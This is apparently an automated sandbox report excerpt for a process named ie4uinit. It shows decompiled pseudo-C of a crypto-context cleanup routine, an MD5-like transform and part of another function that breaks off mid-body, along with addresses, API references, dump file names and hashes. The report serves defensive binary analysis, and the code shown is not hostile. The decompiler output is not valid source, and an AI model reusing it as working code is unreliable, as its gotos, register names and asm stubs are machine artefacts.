				 *((long long*)(__rcx + 0x10)) = 0x319e5290;
				if ( *((intOrPtr*)(__rcx + 0x20)) == 0) goto 0x319d2580;
				E00007FF77FF7319C1698(0x319e5290,  *((intOrPtr*)(__rcx + 0x20)));
				_t17 =  *((intOrPtr*)(_t23 + 0x18));
				if (_t17 == 0) goto 0x319d25a5;
				if ( *_t17 == 0) goto 0x319d259d;
				__imp__CryptReleaseContext();
				 *_t17 =  *_t17 & 0x00000000;
				_t7 = E00007FF77FF7319C1698(0x319e5290, _t17);
				 *_t23 = 0x319e5288;
				return _t7;
			}

0x7ff7319d2550
0x7ff7319d2561
0x7ff7319d2564
0x7ff7319d256e
0x7ff7319d2579
0x7ff7319d257b
0x7ff7319d2580
0x7ff7319d2587
0x7ff7319d258f
0x7ff7319d2593
0x7ff7319d2599
0x7ff7319d25a0
0x7ff7319d25b1
0x7ff7319d25b9

APIs

CryptReleaseContext.ADVAPI32(?,?,?,00007FF7319D2534), ref: 00007FF7319D2593

Part of subcall function 00007FF7319C1698: GetProcessHeap.KERNEL32 ref: 00007FF7319C16A5
Part of subcall function 00007FF7319C1698: HeapFree.KERNEL32 ref: 00007FF7319C16B3

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Heap$ContextCryptFreeProcessRelease
String ID:
API String ID: 2055178999-0
Opcode ID: 80669131ca7073641c0fe89143d468b6609352c1ad61234630c73b6df6470dec
Instruction ID: ecf5f9b4c440d59c6867d6dc910901a2b8fb2d938ecf1e038171b8bc18a8a03d
Opcode Fuzzy Hash: 80669131ca7073641c0fe89143d468b6609352c1ad61234630c73b6df6470dec
Instruction Fuzzy Hash: 90F03126E0AB82A5FF45AF51E490778A364AF48B48FD88531DA4D0A318DF7CD061D320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E20C0 Relevance: .7, Instructions: 654
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E00007FF77FF7319E20C0(long long __rbx, long long __rcx, intOrPtr* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* __r11, intOrPtr* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _t285;
				signed int _t288;
				signed int _t291;
				signed int _t294;
				signed int _t422;
				signed int _t426;
				signed int _t430;
				signed int _t439;
				signed int _t442;
				signed int _t445;
				signed int _t448;
				signed int _t452;
				signed int _t455;
				signed int _t457;
				signed int _t459;
				signed int _t463;
				signed int _t466;
				signed int _t469;
				signed int _t471;
				signed int _t474;
				signed int _t477;
				signed int _t480;
				signed int _t483;
				signed int _t491;
				signed int _t499;
				intOrPtr _t500;
				intOrPtr _t501;
				void* _t503;
				void* _t508;
				void* _t515;
				intOrPtr* _t518;

				_t503 = _t515;
				 *((long long*)(_t503 + 0x10)) = __rbx;
				 *((long long*)(_t503 + 0x18)) = __rbp;
				 *((long long*)(_t503 + 0x20)) = __rsi;
				 *((long long*)(_t503 + 8)) = __rcx;
				_push(_t508);
				r10d =  *(__rcx + 4);
				r11d =  *(__rcx + 8);
				r8d = r10d;
				r9d =  *(__rcx + 0xc);
				r8d =  !r8d;
				r8d = r8d & r9d;
				r8d = r8d | r11d & r10d;
				r8d = r8d +  *__rdx;
				r8d = __r9 - 0x173848aa;
				asm("rol edx, 0x7");
				r9d = __r11 + 0x242070db;
				_t452 =  *((intOrPtr*)(__rcx)) + 0xd76aa478 + r8d + r10d;
				r11d = __rdx - 0xa83f051;
				r8d = r8d + ( !_t452 & r11d | r10d & _t452) +  *((intOrPtr*)(__rdx + 4));
				asm("inc ecx");
				r8d = r8d + _t452;
				r10d = r10d + 0xc1bdceee;
				r9d = r9d + ( !r8d & r10d | r8d & _t452) +  *((intOrPtr*)(__rdx + 8));
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = r10d + ( !r9d & _t452 | r8d & r9d) +  *((intOrPtr*)(__rdx + 0xc));
				asm("inc ecx");
				r10d = r10d + r9d;
				r8d = __r9 - 0x57cfb9ed;
				r11d = r11d + ( !r10d & r8d | r9d & r10d) +  *((intOrPtr*)(__rdx + 0x10));
				asm("inc ecx");
				r11d = r11d + r10d;
				asm("rol edx, 0xc");
				_t455 = __r8 + 0x4787c62a + ( !r11d & r9d | r10d & r11d) +  *((intOrPtr*)(__rdx + 0x14)) + r11d;
				r8d = r8d + ( !_t455 & r10d | _t455 & r11d) +  *((intOrPtr*)(__rdx + 0x18));
				asm("inc ecx");
				r15d =  *((intOrPtr*)(__rdx + 0x1c));
				r9d = __r10 - 0x2b96aff;
				r12d =  *((intOrPtr*)(__rdx + 0x28));
				r8d = r8d + _t455;
				r14d =  *((intOrPtr*)(__rdx + 0x30));
				r13d =  *((intOrPtr*)(__rdx + 0x34));
				r9d = r9d + ( !r8d & r11d | _t455 & r8d) + r15d;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = r9d;
				r10d =  !r10d;
				r10d = r10d & _t455;
				r10d = r10d | r8d & r9d;
				r10d = r10d + 0x698098d8;
				r10d = r10d +  *((intOrPtr*)(__rdx + 0x20));
				r10d = r10d + r11d;
				asm("inc ecx");
				r10d = r10d + r9d;
				r11d = __r10 + 0x6b901122;
				asm("rol edx, 0xc");
				_t457 = _t455 + ( !r10d & r8d | r9d & r10d) + 0x8b44f7af +  *((intOrPtr*)(__rdx + 0x24)) + r10d;
				asm("ror edi, 0xf");
				_t499 = ( !_t457 & r9d | _t457 & r10d) + 0xffff5bb1 + r12d + r8d + _t457;
				r9d = r9d + ( !_t499 & r10d | _t457 & _t499) + 0x895cd7be +  *((intOrPtr*)(__rdx + 0x2c));
				asm("inc ecx");
				r9d = r9d + _t499;
				r11d = r11d + ( !r9d & _t457 | _t499 & r9d) + r14d;
				asm("inc ecx");
				r11d = r11d + r9d;
				asm("rol ebx, 0xc");
				_t501 =  *((intOrPtr*)(__rdx + 0x38));
				r10d = _t508 - 0x5986bc72;
				_t500 =  *((intOrPtr*)(__rdx + 0x3c));
				_t288 = __rdx - 0x2678e6d + ( !r11d & _t499 | r9d & r11d) + r13d + r11d;
				r8d = _t288;
				r8d =  !r8d;
				r10d = r10d + (r8d & r9d | _t288 & r11d) + _t501;
				asm("inc ecx");
				r10d = r10d + _t288;
				r8d = r8d & r10d;
				_t459 =  !r10d;
				r9d = r9d + (_t459 & r11d | _t288 & r10d) + 0x49b40821 + _t500;
				asm("inc ecx");
				r9d = r9d + r10d;
				r8d = r8d | _t288 & r9d;
				r8d = r8d + 0xf61e2562;
				r8d = r8d +  *((intOrPtr*)(__rdx + 4));
				r11d = r11d + r8d;
				r8d = r10d;
				asm("inc ecx");
				r11d = r11d + r9d;
				r8d = r8d & r11d;
				r8d = r8d | _t459 & r9d;
				r8d = r8d + 0xc040b340;
				r10d = __r9 - 0x16493856;
				r8d = r8d +  *((intOrPtr*)(__rdx + 0x18));
				r8d = r8d + _t288;
				asm("inc ecx");
				r8d = r8d + r11d;
				r9d = __r11 - 0x29d0efa3;
				asm("rol edx, 0xe");
				_t463 = __r10 + 0x265e5a51 + ( !r9d & r11d | r8d & r9d) +  *((intOrPtr*)(__rdx + 0x2c)) + r8d;
				r10d = r10d + ( !r11d & r8d | _t463 & r11d) +  *__rdx;
				asm("inc ecx");
				r10d = r10d + _t463;
				r9d = r9d + ( !r8d & _t463 | r8d & r10d) +  *((intOrPtr*)(__rdx + 0x14));
				asm("inc ecx");
				r9d = r9d + r10d;
				r11d = __r8 + 0x2441453;
				r8d = __rdx - 0x275e197f;
				r11d = r11d + ( !_t463 & r10d | _t463 & r9d) + r12d;
				asm("inc ecx");
				r11d = r11d + r9d;
				r10d = __r9 + 0x21e1cde6;
				r8d = r8d + ( !r10d & r9d | r11d & r10d) + _t500;
				asm("inc ecx");
				r8d = r8d + r11d;
				r9d = __r11 - 0x3cc8f82a;
				asm("ror edx, 0xc");
				_t466 = __r10 - 0x182c0438 + ( !r9d & r11d | r8d & r9d) +  *((intOrPtr*)(__rdx + 0x10)) + r8d;
				r11d = _t466;
				r11d =  !r11d;
				r10d = r10d + ( !r11d & r8d | r11d & _t466) +  *((intOrPtr*)(__rdx + 0x24));
				asm("inc ecx");
				r10d = r10d + _t466;
				r11d = r11d & r10d;
				r9d = r9d + ( !r8d & _t466 | r8d & r10d) + _t501;
				asm("inc ecx");
				r9d = r9d + r10d;
				r11d = r11d | r9d & _t466;
				r11d = r11d + 0xf4d50d87;
				r11d = r11d +  *((intOrPtr*)(__rdx + 0xc));
				r11d = r11d + r8d;
				asm("inc ecx");
				r11d = r11d + r9d;
				asm("ror ebx, 0xc");
				_t291 = __rdx + 0x455a14ed + ( !r10d & r9d | r11d & r10d) +  *((intOrPtr*)(__rdx + 0x20)) + r11d;
				r8d = __r9 - 0x3105c08;
				asm("rol edx, 0x5");
				r9d = __r11 + 0x676f02d9;
				_t469 = __r10 - 0x561c16fb + ( !r9d & r11d | r9d & _t291) + r13d + _t291;
				r10d = _t469;
				r10d =  !r10d;
				r8d = r8d + ( !r11d & _t291 | r11d & _t469) +  *((intOrPtr*)(__rdx + 8));
				asm("inc ecx");
				r8d = r8d + _t469;
				r10d = r10d & r8d;
				r9d = r9d + ( !_t291 & _t469 | r8d & _t291) + r15d;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = r10d | r9d & _t469;
				r10d = r10d + 0x8d2a4c8a;
				r10d = r10d + r14d;
				r10d = r10d + _t291;
				asm("inc ecx");
				r10d = r10d + r9d;
				asm("rol edx, 0x4");
				_t471 = _t469 + (r8d ^ r9d ^ r10d) + 0xfffa3942 +  *((intOrPtr*)(__rdx + 0x14)) + r10d;
				r8d = r8d + (r9d ^ r10d ^ _t471) + 0x8771f681 +  *((intOrPtr*)(__rdx + 0x20));
				r11d = __rdx - 0x5b4115bc;
				asm("inc ecx");
				r8d = r8d + _t471;
				r9d = r9d + (r8d ^ r10d ^ _t471) + 0x6d9d6122 +  *((intOrPtr*)(__rdx + 0x2c));
				asm("inc ecx");
				r9d = r9d + r8d;
				_t422 = r8d ^ r9d;
				r10d = r10d + (_t422 ^ _t471) + 0xfde5380c + _t501;
				asm("inc ecx");
				r10d = r10d + r9d;
				r11d = r11d + (_t422 ^ r10d) +  *((intOrPtr*)(__rdx + 4));
				asm("inc ecx");
				r11d = r11d + r10d;
				r8d = __r9 - 0x944b4a0;
				r9d = __r10 - 0x41404390;
				asm("rol edx, 0xb");
				_t474 = __r8 + 0x4bdecfa9 + (r9d ^ r10d ^ r11d) +  *((intOrPtr*)(__rdx + 0x10)) + r11d;
				r10d = __r11 + 0x289b7ec6;
				r8d = r8d + (_t474 ^ r10d ^ r11d) + r15d;
				asm("inc ecx");
				r8d = r8d + _t474;
				_t426 = _t474 ^ r8d;
				r11d = __rdx - 0x155ed806;
				r9d = r9d + (_t426 ^ r11d) + r12d;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = r10d + (_t426 ^ r9d) + r13d;
				asm("inc ecx");
				r10d = r10d + r9d;
				r11d = r11d + (r8d ^ r9d ^ r10d) +  *__rdx;
				asm("inc ecx");
				r11d = r11d + r10d;
				r9d = __r10 - 0x262b2fc7;
				r8d = r8d + (r11d ^ r9d ^ r10d) + 0xd4ef3085 +  *((intOrPtr*)(__rdx + 0xc));
				asm("inc ecx");
				r8d = r8d + r11d;
				_t430 = r11d ^ r8d;
				r10d = __r8 + 0x1fa27cf8;
				asm("ror edx, 0x9");
				_t477 = __r9 + 0x4881d05 + (_t430 ^ r10d) +  *((intOrPtr*)(__rdx + 0x18)) + r8d;
				r9d = r9d + (_t430 ^ _t477) +  *((intOrPtr*)(__rdx + 0x24));
				asm("inc ecx");
				r9d = r9d + _t477;
				r8d = __rdx - 0x3b53a99b;
				asm("rol ecx, 0xb");
				_t439 = (r8d ^ _t477 ^ r9d) + 0xe6db99e5 + r14d + r11d + r9d;
				r10d = r10d + (_t439 ^ _t477 ^ r9d) + _t500;
				asm("inc ecx");
				r10d = r10d + _t439;
				r8d = r8d + (_t439 ^ r10d ^ r9d) +  *((intOrPtr*)(__rdx + 8));
				asm("inc ecx");
				r8d = r8d + r10d;
				r9d = __rcx + 0x432aff97;
				asm("rol edx, 0x6");
				_t480 = __r9 - 0xbd6ddbc + (( !_t439 | r8d) ^ r10d) +  *__rdx + r8d;
				r10d = __r8 - 0x36c5fc7;
				r9d = r9d + (( !r10d | _t480) ^ r8d) + r15d;
				asm("inc ecx");
				r9d = r9d + _t480;
				r8d = __rdx + 0x655b59c3;
				asm("rol ecx, 0xf");
				_t442 = __r10 - 0x546bdc59 + (( !r8d | r9d) ^ _t480) + _t501 + r9d;
				r10d = r10d + (( !_t480 | _t442) ^ r9d) +  *((intOrPtr*)(__rdx + 0x14));
				asm("inc ecx");
				r10d = r10d + _t442;
				r9d = __rcx - 0x100b83;
				r8d = r8d + (( !r9d | r10d) ^ _t442) + r14d;
				asm("inc ecx");
				r8d = r8d + r10d;
				asm("rol edx, 0xa");
				_t483 = __r9 - 0x70f3336e + (( !_t442 | r8d) ^ r10d) +  *((intOrPtr*)(__rdx + 0xc)) + r8d;
				r10d = __r8 + 0x6fa87e4f;
				r9d = r9d + (( !r10d | _t483) ^ r8d) + r12d;
				asm("inc ecx");
				r9d = r9d + _t483;
				asm("ror ecx, 0xb");
				_t445 = __r10 - 0x7a7ba22f + (( !r8d | r9d) ^ _t483) +  *((intOrPtr*)(__rdx + 4)) + r9d;
				r10d = r10d + (( !_t483 | _t445) ^ r9d) +  *((intOrPtr*)(__rdx + 0x20));
				asm("inc ecx");
				r10d = r10d + _t445;
				r11d = __rdx - 0x1d31920;
				r11d = r11d + (( !r9d | r10d) ^ _t445) + _t500;
				asm("inc ecx");
				r11d = r11d + r10d;
				r8d = r11d;
				r8d =  !r8d;
				r9d = r9d + (( !_t445 | r11d) ^ r10d) + 0xa3014314 +  *((intOrPtr*)(__rdx + 0x18));
				asm("inc ecx");
				r9d = r9d + r11d;
				asm("ror ebx, 0xb");
				_t294 = __rcx + 0x4e0811a1 + (( !r10d | r9d) ^ r11d) + r13d + r9d;
				r8d = r8d | _t294;
				r8d = r8d ^ r9d;
				_t518 = _a8;
				r8d = r8d + 0xf7537e82;
				r8d = r8d +  *((intOrPtr*)(__rdx + 0x10));
				r8d = r8d + r10d;
				asm("inc ecx");
				r8d = r8d + _t294;
				 *_t518 =  *_t518 + r8d;
				asm("rol edx, 0xa");
				_t491 = (( !r9d | r8d) ^ _t294) + 0xbd3af235 +  *((intOrPtr*)(__rdx + 0x2c)) + r11d + r8d;
				r8d =  !r8d;
				asm("rol ecx, 0xf");
				_t448 = __r9 + 0x2ad7d2bb + (( !_t294 | _t491) ^ r8d) +  *((intOrPtr*)(__rdx + 8)) + _t491;
				 *((intOrPtr*)(_t518 + 8)) =  *((intOrPtr*)(_t518 + 8)) + _t448;
				r8d = r8d | _t448;
				r8d = r8d ^ _t491;
				r8d = r8d +  *((intOrPtr*)(__rdx + 0x24));
				asm("ror eax, 0xb");
				_t285 = __rbx - 0x14792c6f + r8d +  *((intOrPtr*)(_t518 + 4)) + _t448;
				 *((intOrPtr*)(_t518 + 0xc)) =  *((intOrPtr*)(_t518 + 0xc)) + _t491;
				 *((intOrPtr*)(_t518 + 4)) = _t285;
				return _t285;
			}

0x7ff7319e20c0
0x7ff7319e20c3
0x7ff7319e20c7
0x7ff7319e20cb
0x7ff7319e20cf
0x7ff7319e20d3
0x7ff7319e20dc
0x7ff7319e20e3
0x7ff7319e20e7
0x7ff7319e20ea
0x7ff7319e20ee
0x7ff7319e20f3
0x7ff7319e2102
0x7ff7319e2108
0x7ff7319e210e
0x7ff7319e2115
0x7ff7319e2118
0x7ff7319e211f
0x7ff7319e212d
0x7ff7319e2137
0x7ff7319e213a
0x7ff7319e213e
0x7ff7319e214e
0x7ff7319e215d
0x7ff7319e2160
0x7ff7319e2164
0x7ff7319e2180
0x7ff7319e2183
0x7ff7319e2187
0x7ff7319e2195
0x7ff7319e21a4
0x7ff7319e21a7
0x7ff7319e21ab
0x7ff7319e21c0
0x7ff7319e21c3
0x7ff7319e21d7
0x7ff7319e21da
0x7ff7319e21de
0x7ff7319e21e2
0x7ff7319e21e9
0x7ff7319e21ed
0x7ff7319e21f0
0x7ff7319e21f6
0x7ff7319e220d
0x7ff7319e2210
0x7ff7319e2214
0x7ff7319e221a
0x7ff7319e221d
0x7ff7319e2220
0x7ff7319e2223
0x7ff7319e2229
0x7ff7319e2230
0x7ff7319e2234
0x7ff7319e2237
0x7ff7319e223b
0x7ff7319e224b
0x7ff7319e225d
0x7ff7319e2260
0x7ff7319e2285
0x7ff7319e2288
0x7ff7319e22a0
0x7ff7319e22a3
0x7ff7319e22a7
0x7ff7319e22bc
0x7ff7319e22bf
0x7ff7319e22c3
0x7ff7319e22d7
0x7ff7319e22da
0x7ff7319e22dd
0x7ff7319e22e4
0x7ff7319e22e7
0x7ff7319e22ea
0x7ff7319e22f2
0x7ff7319e2301
0x7ff7319e2304
0x7ff7319e2308
0x7ff7319e230b
0x7ff7319e2314
0x7ff7319e2327
0x7ff7319e232a
0x7ff7319e232e
0x7ff7319e2337
0x7ff7319e233f
0x7ff7319e2346
0x7ff7319e234a
0x7ff7319e234d
0x7ff7319e2350
0x7ff7319e2354
0x7ff7319e235a
0x7ff7319e235d
0x7ff7319e2367
0x7ff7319e236e
0x7ff7319e2375
0x7ff7319e2379
0x7ff7319e237c
0x7ff7319e2380
0x7ff7319e2389
0x7ff7319e239c
0x7ff7319e23a2
0x7ff7319e23b1
0x7ff7319e23b9
0x7ff7319e23bf
0x7ff7319e23ca
0x7ff7319e23cf
0x7ff7319e23d5
0x7ff7319e23dd
0x7ff7319e23e7
0x7ff7319e23fa
0x7ff7319e2402
0x7ff7319e2409
0x7ff7319e2412
0x7ff7319e241d
0x7ff7319e2425
0x7ff7319e242c
0x7ff7319e2435
0x7ff7319e244b
0x7ff7319e2451
0x7ff7319e2456
0x7ff7319e245b
0x7ff7319e2464
0x7ff7319e246d
0x7ff7319e2476
0x7ff7319e2480
0x7ff7319e2485
0x7ff7319e248d
0x7ff7319e2491
0x7ff7319e249c
0x7ff7319e249f
0x7ff7319e24a6
0x7ff7319e24aa
0x7ff7319e24ad
0x7ff7319e24b1
0x7ff7319e24c9
0x7ff7319e24cc
0x7ff7319e24e5
0x7ff7319e24ec
0x7ff7319e24ef
0x7ff7319e24f6
0x7ff7319e2501
0x7ff7319e2506
0x7ff7319e250c
0x7ff7319e2513
0x7ff7319e2517
0x7ff7319e251c
0x7ff7319e2529
0x7ff7319e252c
0x7ff7319e2530
0x7ff7319e2538
0x7ff7319e2541
0x7ff7319e2548
0x7ff7319e254b
0x7ff7319e254e
0x7ff7319e2552
0x7ff7319e2568
0x7ff7319e256b
0x7ff7319e2578
0x7ff7319e257b
0x7ff7319e2582
0x7ff7319e2586
0x7ff7319e259c
0x7ff7319e259f
0x7ff7319e25a3
0x7ff7319e25a6
0x7ff7319e25bb
0x7ff7319e25c1
0x7ff7319e25c5
0x7ff7319e25d1
0x7ff7319e25d4
0x7ff7319e25d8
0x7ff7319e25e3
0x7ff7319e25ea
0x7ff7319e25f1
0x7ff7319e25f4
0x7ff7319e25fe
0x7ff7319e260b
0x7ff7319e260e
0x7ff7319e2612
0x7ff7319e2615
0x7ff7319e261d
0x7ff7319e2627
0x7ff7319e262d
0x7ff7319e2631
0x7ff7319e263d
0x7ff7319e2640
0x7ff7319e264b
0x7ff7319e2653
0x7ff7319e2656
0x7ff7319e265a
0x7ff7319e2666
0x7ff7319e2678
0x7ff7319e267b
0x7ff7319e267f
0x7ff7319e2682
0x7ff7319e268d
0x7ff7319e2696
0x7ff7319e2699
0x7ff7319e26a1
0x7ff7319e26a9
0x7ff7319e26ad
0x7ff7319e26b0
0x7ff7319e26c6
0x7ff7319e26c9
0x7ff7319e26d5
0x7ff7319e26da
0x7ff7319e26de
0x7ff7319e26ea
0x7ff7319e26ed
0x7ff7319e26f1
0x7ff7319e26ff
0x7ff7319e271c
0x7ff7319e271f
0x7ff7319e2722
0x7ff7319e2731
0x7ff7319e2739
0x7ff7319e273d
0x7ff7319e2740
0x7ff7319e2754
0x7ff7319e2757
0x7ff7319e2769
0x7ff7319e2771
0x7ff7319e2775
0x7ff7319e2778
0x7ff7319e2787
0x7ff7319e278e
0x7ff7319e2792
0x7ff7319e27ac
0x7ff7319e27af
0x7ff7319e27b2
0x7ff7319e27c1
0x7ff7319e27c9
0x7ff7319e27cd
0x7ff7319e27de
0x7ff7319e27e1
0x7ff7319e27ec
0x7ff7319e27ef
0x7ff7319e27f3
0x7ff7319e27fb
0x7ff7319e2814
0x7ff7319e281b
0x7ff7319e281f
0x7ff7319e2825
0x7ff7319e282b
0x7ff7319e2836
0x7ff7319e283e
0x7ff7319e2842
0x7ff7319e285c
0x7ff7319e285f
0x7ff7319e2862
0x7ff7319e2867
0x7ff7319e286c
0x7ff7319e2871
0x7ff7319e2878
0x7ff7319e287c
0x7ff7319e287f
0x7ff7319e2883
0x7ff7319e2886
0x7ff7319e289a
0x7ff7319e289d
0x7ff7319e28a5
0x7ff7319e28b8
0x7ff7319e28bb
0x7ff7319e28bd
0x7ff7319e28c1
0x7ff7319e28c4
0x7ff7319e28c7
0x7ff7319e28d3
0x7ff7319e28da
0x7ff7319e28dc
0x7ff7319e28e0
0x7ff7319e28ed

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e19bb8407c61e34a1c47f5836692da4dcdc1168991121e7300244e00ac3f58
Instruction ID: 82e0f835aa9a9839fd79e255aabd4db2effa518367415e349a483134cbbbe018
Opcode Fuzzy Hash: 70e19bb8407c61e34a1c47f5836692da4dcdc1168991121e7300244e00ac3f58
Instruction Fuzzy Hash: 9312B4B7F3841047D72DCB19EC52FA976A2B7A4348749A02CA607D3F44EA3DFE158A44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D0C4C Relevance: .2, Instructions: 229
COMMONCrypto

Download Yara Rule

C-Code - Quality: 45%

			E00007FF77FF7319D0C4C(long long __rax, signed int __rbx, long long __rcx, intOrPtr* __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t141;
				signed long long _t142;
				void* _t157;
				signed int _t160;
				signed long long _t163;
				signed int _t177;
				signed int _t178;
				long long _t190;
				intOrPtr* _t208;
				long long _t223;
				long long _t225;
				long long _t227;
				void* _t230;
				long long _t231;
				long long _t233;
				void* _t235;
				void* _t236;
				void* _t238;
				void* _t247;
				void* _t248;
				void* _t250;
				void* _t252;
				void* _t255;

				_t188 = __rbx;
				 *((long long*)(_t238 + 8)) = __rbx;
				 *((long long*)(_t238 + 0x10)) = __rdx;
				_t236 = _t238 - 0x27;
				 *(_t236 - 9) =  *(_t236 - 9) & __rbx;
				r12d = 0;
				 *(_t236 - 0x41) =  *(_t236 - 0x41) & __rbx;
				r13d = 0;
				r15d = 0;
				 *(_t236 - 0x39) = __rbx;
				r14d = 0;
				_t231 = __rcx;
				 *((intOrPtr*)(_t236 + 0x7f)) = 0;
				if (0 -  *__rdx >= 0) goto 0x319d0e08;
				 *(_t236 + 0x77) =  *(_t236 + 0x77) & 0x00000000;
				 *(_t236 - 0x59) = __rax;
				 *((long long*)(_t236 - 0x51)) = __rax;
				_t177 = _t236 - 0x59;
				 *(_t238 - 0xb0 + 0x20) = _t177;
				if (E00007FF77FF7319D5A7C( *__rdx, 0 -  *__rdx, _t177, __rbx,  *((intOrPtr*)(__rdx + 8)), _t233, _t236 + 0x7f, _t236 + 0x77, _t255, _t252) < 0) goto 0x319d0f12;
				_t141 =  *(_t236 + 0x77);
				_t160 = _t141;
				if (_t160 == 0) goto 0x319d0d69;
				_t142 = _t141 - 1;
				if (_t160 == 0) goto 0x319d0d26;
				if (_t142 != 1) goto 0x319d0df0;
				 *(_t236 - 0x19) =  *(_t236 - 0x19) & 0x00000000;
				r13d = 0;
				 *(_t236 - 0x21) = _t177;
				 *(_t236 - 0x29) = r13d;
				if (_t142 == 0) goto 0x319d0d1c;
				r8d = _t142;
				E00007FF77FF7319CE900(_t177, _t188, _t236 - 0x29,  *((intOrPtr*)(_t236 - 0x51)), _t233, _t236);
				_t178 =  *(_t236 - 0x21);
				r13d =  *(_t236 - 0x29);
				 *(_t236 - 0x41) = _t178;
				goto 0x319d0d5f;
				 *(_t236 - 0x19) =  *(_t236 - 0x19) & 0x00000000;
				r12d = 0;
				 *(_t236 - 0x21) = _t178;
				 *(_t236 - 0x29) = r12d;
				_t163 = _t142;
				if (_t163 == 0) goto 0x319d0d57;
				r8d = _t142;
				E00007FF77FF7319CE900(_t178, _t188, _t236 - 0x29,  *((intOrPtr*)(_t236 - 0x51)), _t233, _t236);
				r12d =  *(_t236 - 0x29);
				 *(_t236 - 9) =  *(_t236 - 0x21);
				E00007FF77FF7319C1698( *(_t236 - 0x21),  *(_t236 - 9));
				goto 0x319d0df0;
				 *(_t236 - 0x29) =  *(_t236 - 0x29) & 0x00000000;
				r15d =  *(_t236 - 0x59);
				r15d = r15d + 0xfffffffc;
				 *(_t236 - 1) = r15d;
				if (_t163 == 0) goto 0x319d0d95;
				E00007FF77FF7319D58E8( *(_t236 - 0x21), _t188,  *((intOrPtr*)(_t236 - 0x51)), _t236 - 0x29, _t231, _t233, _t236 - 1, __rdx, _t247, _t250, _t248);
				_t189 =  *(_t236 - 0x29);
				goto 0x319d0d99;
				if (0 < 0) goto 0x319d0f12;
				 *(_t236 + 7) = r15d;
				if (_t252 == 0) goto 0x319d0db2;
				E00007FF77FF7319C1698( *(_t236 - 0x21), _t252);
				 *((long long*)(_t236 + 0xf)) =  *(_t236 - 0x29);
				if ( *(_t236 - 0x39) == 0) goto 0x319d0dd4;
				 *0x319e7038(_t235);
				 *(_t236 - 0x39) =  *(_t236 - 0x39) & 0x00000000;
				asm("movups xmm0, [ebp+0x7]");
				_t223 =  *((intOrPtr*)(_t231 + 0x18));
				asm("movdqu [ebp-0x29], xmm0");
				_t157 = E00007FF77FF7319D1010( *(_t236 - 0x29), _t236 - 0x29, _t223, _t233, _t236 - 0x39, _t230, _t233);
				_t190 =  *(_t236 - 0x39);
				if (_t157 < 0) goto 0x319d0f12;
				goto 0x319d0c94;
				if (_t157 < 0) goto 0x319d0f12;
				if ( *((intOrPtr*)(_t231 + 0x10)) == _t190) goto 0x319d0e48;
				if (_t190 == 0) goto 0x319d0e32;
				 *0x319e7038();
				_t208 =  *((intOrPtr*)(_t231 + 0x10));
				if (_t208 == 0) goto 0x319d0e44;
				_t185 =  *((intOrPtr*)( *_t208 + 0x10));
				 *0x319e7038();
				 *((long long*)(_t231 + 0x10)) = _t190;
				 *((intOrPtr*)(_t236 - 0x49)) = 0;
				 *((long long*)(_t236 - 0x51)) = _t223;
				 *(_t236 - 0x59) = 0;
				if (r12d == 0) goto 0x319d0e77;
				r8d = r12d;
				E00007FF77FF7319CE900( *((intOrPtr*)( *_t208 + 0x10)), _t190, _t236 - 0x59,  *(_t236 - 9), _t233, _t236);
				_t225 =  *((intOrPtr*)(_t236 - 0x51));
				 *(_t231 + 0x38) =  *(_t236 - 0x59);
				 *((long long*)(_t231 + 0x40)) = _t225;
				 *((intOrPtr*)(_t231 + 0x48)) =  *((intOrPtr*)(_t236 - 0x49));
				E00007FF77FF7319C1698( *((intOrPtr*)( *_t208 + 0x10)),  *((intOrPtr*)(_t231 + 0x40)));
				 *((intOrPtr*)(_t236 - 0x49)) = 0;
				 *((long long*)(_t236 - 0x51)) = _t225;
				 *(_t236 - 0x59) = 0;
				if (r13d == 0) goto 0x319d0ebc;
				r8d = r13d;
				E00007FF77FF7319CE900( *((intOrPtr*)( *_t208 + 0x10)),  *(_t236 - 0x41), _t236 - 0x59,  *(_t236 - 0x41), _t233, _t236);
				_t227 =  *((intOrPtr*)(_t236 - 0x51));
				 *(_t231 + 0x50) =  *(_t236 - 0x59);
				 *((long long*)(_t231 + 0x58)) = _t227;
				 *((intOrPtr*)(_t231 + 0x60)) =  *((intOrPtr*)(_t236 - 0x49));
				E00007FF77FF7319C1698( *((intOrPtr*)( *_t208 + 0x10)),  *((intOrPtr*)(_t231 + 0x58)));
				 *((intOrPtr*)(_t236 - 0x49)) = 0;
				 *((long long*)(_t236 - 0x51)) = _t227;
				 *(_t236 - 0x59) = 0;
